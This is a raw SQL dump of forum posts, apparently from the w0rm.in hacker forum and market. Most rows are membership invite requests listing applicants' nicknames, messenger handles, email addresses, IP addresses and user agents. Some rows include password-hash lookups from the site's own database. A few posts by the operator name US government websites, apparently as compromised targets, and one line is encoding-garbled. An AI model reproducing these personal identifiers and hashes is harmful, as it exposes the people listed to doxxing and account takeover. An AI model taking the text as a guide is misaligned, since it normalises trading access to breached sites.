from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 185.8.107.39\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://kapr.ru | kapr.ru \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1563, 1415, 0, 'Invite', 2, '{$name}', 1407867026, '[SIZE=\'4\'][COLOR=\'Sienna\']dw0rd[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: 1111111\n[b]e-mail[/b]: [email]dw0rd@cardinc.org[/email]\n[b]Info[/b]: *************************************************************************\nThe decision will be made automatically, after u send request upload this page again.\n*************************************************************************\n\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \n\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 72.243.110.215\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: [url]https://forum.antichat.ru/member.php?u=22714[/url] | [url]https://forum.antichat.ru/member.php?u=22714[/url] \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1564, 1064, 1073, 'w0rm', 1, '', 1407873652, '[url]http://www.usda.gov[/url] - ÿûðтÑÂÑ‚ хþрþшþ õÑÂûø чтþ-тþ ýðùôõтõ ÑÂúøýу úþýтðúт ÷ðúð÷чøúð.', 1, 0, '', 0, 1, 0, 0, 0), (1565, 1416, 0, 'Invite', 2, '{$name}', 1407884834, '[SIZE=\'4\'][COLOR=\'Sienna\']tafra[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: goldpowerdamla@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 78.165.158.13\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Linux; Android 4.1.2; LG-E975 Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.131 Mobile Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://wirrycow.wordpress.com/ | http://wirrycow.wordpress.com/ \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1566, 1417, 0, 'Invite', 2, '{$name}', 1407894135, '[SIZE=\'4\'][COLOR=\'Sienna\']lumbricus[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: zamkneseh@creep.im\n[b]e-mail[/b]: dmitrystevenson112@hotmail.com\n[b]Info[/b]: With mixederous skills revolving* around web application research. Embedded device exploitation, strong knowledge of x86 Assembly and other hardware vulnerability research. \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 79.134.235.132\n[*][b]real ip[/b]: 79.134.235.132\n[*][b]User agent[/b]: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://lumbricus.livejournal.com | lumbricus.livejournal.com \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1567, 1418, 0, 'Invite', 2, '{$name}', 1407906781, '[SIZE=\'4\'][COLOR=\'Sienna\']oaz_tester_1[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: 123123\n[b]e-mail[/b]: cyber-punk@xakep.ru\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 5.228.94.73\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1568, 1419, 0, 'Invite', 2, '{$name}', 1407906946, '[SIZE=\'4\'][COLOR=\'Sienna\']oaz_tester_3[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: 123123\n[b]e-mail[/b]: oaz@mail.ru\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 94.242.252.41\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1569, 1420, 0, 'Invite', 2, '{$name}', 1407918139, '[SIZE=\'4\'][COLOR=\'Sienna\']test[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: test@tgest.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 79.134.235.132\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : Test : test@test.com : 80.93.122.2 : bb5a3fcb975122642d8a9f59608c01a9\n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://test.org.ua | test.org.ua \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1570, 1421, 0, 'Invite', 2, '{$name}', 1407928260, '[SIZE=\'4\'][COLOR=\'Sienna\']Nickname[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: Email@123.ru\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 158.255.211.156\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1575, 1427, 0, 'Invite', 2, '{$name}', 1407932686, '[SIZE=\'4\'][COLOR=\'Sienna\']masterseeker[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: mstseeker@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 46.165.222.245\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://masterseeker.findmysoft.com | masterseeker.findmysoft.com \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1573, 1423, 0, 'Invite', 2, 'opensc', 1407931033, '[SIZE=\'4\'][COLOR=\'Sienna\']opensc[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: opensc@jabbim.com\n[b]e-mail[/b]: admin@opensc.ws\n[b]Info[/b]: Привет,\r\n\r\nЯ админ форума opensc.ws. У меня есть предложение насчет маркета w0rm.in. Готов предложить рекламу твоего ресурса на нашем форуме за акк на w0rm.in. Можем разместить сразу большой баннер в шапку форума. Жду ответа. \r\n\r\nАдминистратор opensc.ws.\r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 91.108.183.34\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/34.0.1847.116 Chrome/34.0.1847.116 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://opensc.org | opensc.org \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1574, 1425, 0, 'lumbricus', 39, 'Job Offering - Looking for Advanced Web App Security Testers - JSP/PHP/ASP.net', 1407931545, '/close thread*', 1, 0, '', 0, 1, 0, 0, 0), (1673, 1490, 1670, 'ropertus', 33, '', 1408369801, 'The first site is not working?', 1, 1, '', 0, 1, 0, 0, 0), (1674, 1493, 0, 'Invite', 2, '{$name}', 1408370618, '[SIZE=\'4\'][COLOR=\'Sienna\']Daikokuten[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: 640C407282\n[b]e-mail[/b]: josete100@hotmail.es\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 200.35.149.224\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://daikokuten.pro | daikokuten.pro \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1576, 1428, 0, 'Invite', 2, '{$name}', 1407934157, '[SIZE=\'4\'][COLOR=\'Sienna\']staph_x[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: staph_x@xmpp.jp\n[b]e-mail[/b]: staph_x@mail.com\n[b]Info[/b]: Все время изучаю программирование, у меня опыт с большими CMS и люблю найти уязвимости в них. До сих пор у меня нет релизов, но я хочу улучшить свою способность до того как я уверен что я могу писать достойный проект. Город рождения Брянск (Слава Партизанам!), но долго живу за граница (уже лет 20). У меня профили на вф, коровка, монополи, експлойт, и другие. \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 185.41.140.20\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://staph-x.blogspot.com | staph-x.blogspot.com \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1577, 1429, 0, 'Invite', 2, '{$name}', 1407935943, '[SIZE=\'4\'][COLOR=\'Sienna\']phiA[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: \n[b]e-mail[/b]: root@pasuruanblackhat.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 180.253.74.150\n[*][b]real ip[/b]: 180.253.74.150\n[*][b]User agent[/b]: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://phia.com | phia.com \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1578, 1430, 0, 'Invite', 2, '{$name}', 1407936030, '[SIZE=\'4\'][COLOR=\'Sienna\']Nickname[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: dicks@dicks.dicks\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 94.102.52.76\n[*][b]real ip[/b]: 94.102.52.76\n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1579, 1431, 0, 'Invite', 2, '{$name}', 1407936925, '[SIZE=\'4\'][COLOR=\'Sienna\']FBI[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: fbi@fbi.gov\n[b]e-mail[/b]: fbi@fbi.gov\n[b]Info[/b]: No this is not wrong comments.No this is not wrong comments.No this is not wrong comments.No this is not wrong comments.No this is not wrong comments.No this is not wrong comments.No this is not wrong comments.No this is not wrong comments.No this is not wrong comments.No this is not wrong comments.No this is not wrong comments.No this is not wrong comments.No this is not wrong comments.No this is not wrong comments.No this is not wrong comments.No this is not wrong comments.No this is not wrong comments.No this is not wrong comments.No this is not wrong comments.No this is not wrong comments.No this is not wrong comments.No this is not wrong comments.No this is not wrong comments.No this is not wrong comments.No this is not wrong comments.No this is not wrong comments.No this is not wrong comments.No this is not wrong comments.No this is not wrong comments.No this is not wrong comments.No this is not wrong comments.No this is not wrong comments.No this is not wrong comments.No this is not wrong comments.No this is not wrong comments.No this is not wrong comments.No this is not wrong comments.No this is not wrong comments.No this is not wrong comments.No this is not wrong comments.No this is not wrong comments.No this is not wrong comments.No this is not wrong comments.No this is not wrong comments.No this is not wrong comments.No this is not wrong comments.No this is not wrong comments.No this is not wrong comments.No this is not wrong comments.No this is not wrong comments.No this is not wrong comments.No this is not wrong comments.No this is not wrong comments.No this is not wrong comments.No this is not wrong comments.No this is not wrong comments.No this is not wrong comments.No this is not wrong comments.No this is not wrong comments.No this is not wrong comments.\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 94.102.52.76\n[*][b]real ip[/b]: 94.102.52.76\n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : FBI : foto1986@list.ru : 87.244.187.183 : c06e0ef89e871eeadeec041e3d1a8380\n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://fbi.gov | fbi.gov \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1580, 1432, 0, 'Invite', 2, '{$name}', 1407938919, '[SIZE=\'4\'][COLOR=\'Sienna\']samirsamo[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: samirsamo\n[b]e-mail[/b]: samirsamo1337@fbi.al\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 80.78.68.141\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.154 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://idealdesigner.net/forums/user/11277-samirsamo/ | http://idealdesigner.net/forums/user/11277-samirsamo/ \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1581, 1064, 1073, 'w0rm', 1, '', 1407939411, '[url]http://www.eia.gov/[/url] +1', 1, 0, '', 0, 1, 0, 0, 0), (1582, 1433, 0, 'Invite', 2, '{$name}', 1407942450, '[SIZE=\'4\'][COLOR=\'Sienna\']joeroot[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: j0er00t@exploit.im/691768633\n[b]e-mail[/b]: exploitinc0x0@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 175.110.71.56\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: https://twitter.com/joeroot05 | https://twitter.com/joeroot05 \n[/url] 